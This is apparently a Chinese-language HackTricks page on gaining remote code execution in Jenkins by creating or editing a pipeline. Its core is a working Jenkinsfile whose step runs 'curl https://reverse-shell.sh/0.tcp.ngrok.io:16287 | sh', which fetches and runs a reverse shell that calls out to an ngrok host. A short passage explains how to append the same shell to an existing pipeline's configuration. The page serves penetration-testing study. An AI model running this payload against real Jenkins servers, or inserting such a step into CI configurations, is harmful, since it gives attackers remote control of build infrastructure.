Jenkins RCE 创建/修改管道

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

创建新管道

在“新项目”(可在 /view/all/newJob 访问)中选择 Pipeline:

Pipeline 部分 中写入 reverse shell

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

最后点击 SaveBuild Now,管道将被执行:

修改管道

如果您可以访问某个已配置管道的配置文件,您可以直接 修改它,附加您的反向 shell,然后执行它或等待它被执行。

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks